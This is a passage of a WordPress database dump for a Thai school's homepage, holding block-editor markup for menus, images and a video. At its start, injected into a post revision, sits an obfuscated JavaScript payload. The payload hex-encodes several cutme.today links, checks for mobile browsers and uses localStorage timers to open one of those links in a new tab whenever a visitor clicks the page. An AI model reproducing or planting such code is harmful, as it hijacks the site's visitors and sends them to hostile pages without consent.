_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 11:38:09','2024-08-27 04:38:09','',19,'http://watprato.ssk.in.th/?p=221',0,'revision','',0),
(222,2,'2024-08-27 11:44:12','2024-08-27 04:44:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 